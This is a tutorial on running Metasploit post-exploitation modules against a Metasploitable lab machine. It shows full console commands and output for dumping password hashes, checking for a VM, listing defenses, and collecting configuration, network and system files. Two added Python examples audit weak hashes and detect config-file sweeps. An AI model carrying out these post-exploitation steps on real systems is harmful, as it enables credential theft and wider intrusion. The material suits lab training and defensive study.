How To: Quickly Gather Target Information with Metasploit Post Modules

Post-exploitation information gathering can be a long and drawn-out process, but it is an essential step when trying to pivot or establish advanced persistence. Every hacker should know how to enumerate a target manually, but sometimes it is worth it to automate the process. Metasploit contains post modules that can quickly gather valuable information about a target, saving both time and effort.

In the previous tutorial, we used Metasploit's local exploit suggester to get root on the target. To use post modules, we need to have a Meterpreter session running. These modules will run as any user to some extent, but having root-level access is ideal as it allows us unrestricted access to the system.

What Information Is Most Valuable to an Attacker?

It has been said time and time again that reconnaissance is one of the most critical phases of an attack. It applies not only to the initial preparation for an attack but also to the post-exploitation stage. Successful mining of information after a target is compromised can lead to longer persistence and exploitation of additional machines.

Some of the most valuable information to an attacker includes things like password hashes, credentials, and any other sensitive data that could be abused. Other items of interest are network configurations, system configurations, and config files of standard software likely to be found on the system. Checking what defenses are in place, such as antivirus or firewall rules, is also a smart move.

Module 1: Hashdump

To get started, from the main prompt in Metasploit, use the sessions command to display the current sessions running in the background:

msf5 > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
  2         meterpreter x86/linux  uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain  10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)
  3         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  10.10.0.1:4321 -> 10.10.0.50:56950 (10.10.0.50)

Session 3 is ideal here since it is running as root; this is the Meterpreter session we obtained in the previous tutorial, but any root session will suffice.

To see the available post modules, we can start by typing the full path and quickly pressing Tab twice to see the autocomplete options:

msf5 > use post/linux/gather/

use post/linux/gather/checkcontainer         use post/linux/gather/enum_network           use post/linux/gather/enum_xchat             use post/linux/gather/openvpn_credentials
use post/linux/gather/checkvm                use post/linux/gather/enum_protections       use post/linux/gather/gnome_commander_creds  use post/linux/gather/phpmyadmin_credsteal
use post/linux/gather/ecryptfs_creds         use post/linux/gather/enum_psk               use post/linux/gather/gnome_keyring_dump     use post/linux/gather/pptpd_chap_secrets
use post/linux/gather/enum_commands          use post/linux/gather/enum_system            use post/linux/gather/hashdump               use post/linux/gather/tor_hiddenservices
use post/linux/gather/enum_configs           use post/linux/gather/enum_users_history     use post/linux/gather/mount_cifs_creds

The first one we will try out is the hashdump module; this will dump the password hashes for all users on the system, which we can then attempt to crack. Even though we already have root on this machine, other credentials can often be used to pivot around the network.

Load the module with the use command:

msf5 > use post/linux/gather/hashdump

We can then look at the options for this post module:

msf5 post(linux/gather/hashdump) > options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

The only thing we need to set is the session to run this on. To do so, use the set command and the appropriate session number:

msf5 post(linux/gather/hashdump) > set session 3

session => 3

Then, simply type run to launch it:

msf5 post(linux/gather/hashdump) > run

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20190619120310_default_10.10.0.50_linux.hashes_719586.txt
[*] Post module execution completed

We can see the hashes for all users on the system now, and it even writes this information to a file for us.
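Seen from the defending side, the notable detail in this output is that every hash begins with $1$, the MD5-crypt scheme. The following added example (not part of the original tutorial or of Metasploit) audits lines in the same name:hash:uid:gid:gecos:home:shell layout; the scheme table, the weak/acceptable split, and the sample accounts are assumptions made for the illustration.

```python
# Added example: flag weak or missing password hashes in unshadowed lines.
# crypt(3) identifier -> (scheme, weak?). The weak/acceptable split is this
# example's policy assumption, not something the tutorial states.
SCHEMES = {
    "1": ("md5crypt", True),
    "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False),
    "5": ("sha256crypt", False),
    "6": ("sha512crypt", False),
    "y": ("yescrypt", False),
}
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}

# Constructed sample; the salts and hashes are placeholders, not real values.
SAMPLE = """\
[+] root:$1$SALT0001$PLACEHOLDERPLACEHOLDER:0:0:root:/root:/bin/bash
[+] klog:$1$SALT0002$PLACEHOLDERPLACEHOLDER:103:104::/home/klog:/bin/false
[+] alice:$6$SALT0003$PLACEHOLDER:1000:1000:Alice,,,:/home/alice:/bin/bash
[+] daemon:*:1:1:daemon:/usr/sbin:/bin/sh
[+] bob:PLACEHOLDER13:1001:1001::/home/bob:/bin/bash
[+] Unshadowed Password File: /tmp/constructed-example.txt
"""


def classify(hash_field):
    """Return (scheme, weak) or None when the account is locked."""
    if hash_field == "":
        return ("empty-password", True)
    if hash_field[0] in "!*" or hash_field == "x":
        return None
    if hash_field.startswith("$"):
        parts = hash_field.split("$")
        ident = parts[1] if len(parts) > 2 else ""
        return SCHEMES.get(ident, ("unknown:" + ident, True))
    # No "$id$" prefix: traditional DES crypt or something unrecognised.
    return ("descrypt-or-unknown", True)


def audit(text):
    """Return one finding per account whose stored hash is weak."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[+] "):  # accept lines pasted from module output
            line = line[4:]
        fields = line.split(":")
        if len(fields) != 7:  # skips banners and the loot-path line
            continue
        name, hash_field, uid, _gid, _gecos, _home, shell = fields
        verdict = classify(hash_field)
        if verdict is None or not verdict[1]:
            continue
        findings.append({
            "user": name,
            "scheme": verdict[0],
            "interactive_shell": shell not in NOLOGIN_SHELLS,
            "system_account": uid.isdigit() and 0 < int(uid) < 1000,
        })
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

Accounts that combine a weak scheme with an interactive shell are the ones to rehash first; a system account that carries a password hash at all, like klog in the sample, is worth reviewing separately.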

Module 2: Checkvm

The next module we will try is the checkvm module; this will attempt to determine whether the target is a virtual machine or not, which can be useful information for specific exploits or attack vectors.

Load the module:

msf5 post(linux/gather/hashdump) > use post/linux/gather/checkvm

And take a look at the options:

msf5 post(linux/gather/checkvm) > options

Module options (post/linux/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Again, we only need to set a session number for this module to work. Since our session number won't change going forward, we can use the setg command to set the option globally. That way, we won't have to keep typing in the same thing over and over again.

msf5 post(linux/gather/checkvm) > setg session 3

session => 3

Type run to kick it off:

msf5 post(linux/gather/checkvm) > run

[*] Gathering System info ....
[+] This appears to be a 'VirtualBox' virtual machine
[*] Post module execution completed

We can see that it determines the target appears to be a VirtualBox virtual machine.

Module 3: enum_protections

The next one we will try out is the enum_protections module; this tries to find certain programs on the target that can be used to detect an attack, like antivirus, firewalls, IDS/IPS, network sniffing software, and others.

Load the module:

msf5 post(linux/gather/checkvm) > use post/linux/gather/enum_protections

Since we globally set the session option earlier, it is already set for us when we look at the options:

msf5 post(linux/gather/enum_protections) > options

Module options (post/linux/gather/enum_protections):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on.

All we have to do now is run the module:

msf5 post(linux/gather/enum_protections) > run

[*] Running module against 10.10.0.50 [metasploitable]
[*] Info:
[*]                     _                  _       _ _        _     _      ____   _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                            |_|                                          Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started
[*]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[*] Finding system protections...
[+] ASLR is enabled
[*] Finding installed applications...
[+] ufw found: /usr/sbin/ufw
[+] iptables found: /sbin/iptables
[+] logrotate found: /usr/sbin/logrotate
[+] tcpdump found: /usr/sbin/tcpdump
[+] aa-status found: /usr/sbin/aa-status
[*] Post module execution completed

We can see it gives us a banner this time, although it is a little disjointed, and information about any system protections in place. It looks like it found some firewall software and tcpdump, and that ASLR is enabled; this kind of information can be very valuable when preparing an attack.

Module 4: enum_configs

The next module we will try is the enum_configs module; this will attempt to find any configuration files for commonly installed software. While this information could be found manually, the module makes it easy to quickly gather everything up all at once.

Load the module:

msf5 post(linux/gather/enum_protections) > use post/linux/gather/enum_configs

And run it:

msf5 post(linux/gather/enum_configs) > run

[*] Running module against 10.10.0.50 [metasploitable]
[*] Info:
[*]                     _                  _       _ _        _     _      ____   _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                            |_|                                          Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started
[*]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+] apache2.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt
[+] ports.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_670485.txt
[-] Failed to open file: /etc/nginx/nginx.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snort/snort.conf: core_channel_open: Operation failed: 1
[+] my.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_055449.txt
[+] ufw.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_162601.txt
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_122073.txt
[-] Failed to open file: /etc/security.access.conf: core_channel_open: Operation failed: 1
[+] shells stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_678197.txt
[-] Failed to open file: /etc/security/sepermit.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/ca-certificates.conf: core_channel_open: Operation failed: 1
[+] access.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_706115.txt
[-] Failed to open file: /etc/gated.conf: core_channel_open: Operation failed: 1
[+] rpc stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_755377.txt
[-] Failed to open file: /etc/psad/psad.conf: core_channel_open: Operation failed: 1
[+] debian.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_345601.txt
[-] Failed to open file: /etc/chkrootkit.conf: core_channel_open: Operation failed: 1
[+] logrotate.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_800174.txt
[-] Failed to open file: /etc/rkhunter.conf: core_channel_open: Operation failed: 1
[+] smb.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_570254.txt
[+] ldap.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_677851.txt
[-] Failed to open file: /etc/openldap/openldap.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/cups.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/opt/lampp/etc/httpd.conf: core_channel_open: Operation failed: 1
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_441838.txt
[-] Failed to open file: /etc/proxychains.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/snmp.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/mail/sendmail.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snmp/snmp.conf: core_channel_open: Operation failed: 1
[*] Post module execution completed

We can see it found all kinds of things, like an Apache config, sysctl, smb, and others. It also stores each of these files it finds in a directory for later use. For instance, we can view the Apache config by catting out the full path of the file:

msf5 post(linux/gather/enum_configs) > cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt

[*] exec: cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt

#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

...
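The enum_configs run above leaves a recognizable trace on the target: one process tries to open a long list of configuration files within seconds, including files for security tools that are not even installed. The following added example (not from the original tutorial or from Metasploit) shows detection logic for that pattern; the event layout, the process name "payload", the window, and the threshold are assumptions, and the watched paths are taken from the failed-open lines in the output.

```python
from collections import defaultdict, deque

# Paths taken from the failed-open lines in the enum_configs output above.
WATCHED = {
    "/etc/nginx/nginx.conf", "/etc/snort/snort.conf", "/etc/psad/psad.conf",
    "/etc/chkrootkit.conf", "/etc/rkhunter.conf", "/etc/proxychains.conf",
    "/etc/gated.conf", "/etc/snmp/snmp.conf", "/etc/mail/sendmail.conf",
}

# Constructed events, one per line: epoch_seconds pid command path result.
# This layout is an assumption for the example, not a real audit log format.
SAMPLE_EVENTS = """\
1000 812 apache2 /etc/apache2/apache2.conf ok
1001 4242 payload /etc/nginx/nginx.conf ENOENT
1001 4242 payload /etc/snort/snort.conf ENOENT
1002 4242 payload /etc/psad/psad.conf ENOENT
1002 4242 payload /etc/chkrootkit.conf ENOENT
1003 4242 payload /etc/rkhunter.conf ENOENT
1500 977 snmpd /etc/snmp/snmp.conf ok
2000 977 snmpd /etc/snmp/snmp.conf ok
"""


def parse(text):
    """Yield (ts, pid, comm, path, result) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, pid, comm, path, result = parts
        yield int(ts), int(pid), comm, path, result


def detect_sweeps(text, window=10, threshold=4):
    """Alert once per PID that touches at least `threshold` distinct watched
    paths within `window` seconds, whether or not the opens succeed."""
    recent = defaultdict(deque)  # pid -> (ts, path) pairs still in the window
    alerted = set()
    alerts = []
    for ts, pid, comm, path, _result in sorted(parse(text)):
        if path not in WATCHED or pid in alerted:
            continue
        queue = recent[pid]
        queue.append((ts, path))
        while queue and ts - queue[0][0] > window:
            queue.popleft()  # drop events that fell out of the window
        distinct = {p for _, p in queue}
        if len(distinct) >= threshold:
            alerted.add(pid)
            alerts.append({
                "pid": pid,
                "comm": comm,
                "first_ts": queue[0][0],
                "last_ts": ts,
                "paths": sorted(distinct),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_sweeps(SAMPLE_EVENTS):
        print(alert)
```

A service that reads its own configuration file, like snmpd in the sample, never reaches the threshold because it touches only one watched path.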

Module 5: enum_network

The next module we'll run is the enum_network module; this will gather any network-related information on the target, such as IP addresses, routes, open ports, SSH configs, and DNS information.

Load the module:

msf5 post(linux/gather/enum_configs) > use post/linux/gather/enum_network

And run it:

msf5 post(linux/gather/enum_network) > run

[*] Running module against metasploitable.localdomain
[*] Module running as root
[+] Info:
[+]                     _                  _       _ _        _     _      ____   _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                            |_|                                          Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started
[+]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[*] Collecting data...
[+] Network config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt
[+] Route table stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_402588.txt
[+] Firewall config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_273816.txt
[+] DNS config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_884409.txt
[+] SSHD config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_100280.txt
[+] Host file stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_071264.txt
[+] SSH keys stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_372706.txt
[+] Active connections stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_029831.txt
[+] Wireless information stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_821137.txt
[+] Listening ports stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_676900.txt
[+] If-Up/If-Down stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_258463.txt
[*] Post module execution completed

We can see it collected a plethora of network information, all of which could be useful for an attacker. For example, we can view the network config file:

msf5 post(linux/gather/enum_network) > cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

[*] exec: cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

eth0      Link encap:Ethernet  HWaddr 08:00:27:77:62:6c
          inet addr:10.10.0.50  Bcast:10.10.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe77:626c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2643 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2139 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2268520 (2.1 MB)  TX bytes:361635 (353.1 KB)
          Base address:0xd010 Memory:f0000000-f0020000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:325 errors:0 dropped:0 overruns:0 frame:0
          TX packets:325 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:125465 (122.5 KB)  TX bytes:125465 (122.5 KB)

Module 6: enum_system

The last module we will cover today is the enum_system module; this will collect system information about the target, including Linux version, installed packages, running services, cron jobs, and user accounts. Again, these are all things that could be found manually, but sometimes it makes more sense to have it done for you all at once.

Load the module:

msf5 post(linux/gather/enum_network) > use post/linux/gather/enum_system

And run it:

msf5 post(linux/gather/enum_system) > run

[+] Info:
[+]                     _                  _       _ _        _     _      ____   _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                            |_|                                          Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started
[+]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+]     Module running as "root" user
[*] Linux version stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_406677.txt
[*] User accounts stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt
[*] Installed Packages stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_051826.txt
[*] Running Services stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_438719.txt
[*] Cron jobs stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_890911.txt
[*] Disk info stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_036761.txt
[*] Logfiles stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_749148.txt
[*] Setuid/setgid files stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_378666.txt
[*] Post module execution completed

We can see it discovered valuable system information. For instance, we can view all the user accounts on the system:

msf5 post(linux/gather/enum_system) > cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

[*] exec: cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
libuuid
dhcp
syslog
klog
sshd
msfadmin
bind
postfix
ftp
postgres
mysql
tomcat55
distccd
user
service
telnetd
proftpd
statd

Wrapping Up

Today, we explored some of Metasploit's post modules to gather valuable information about the target. We covered modules to check for what protections are in place and whether the system is a VM or not, modules to discover configuration information pertaining to the network and common software, and even a module to dump password hashes. While all of this information can be gathered manually, Metasploit makes the job quick and painless.

Cover image by Soumil Kumar/Pexels; Screenshots by drd_/Null Byte
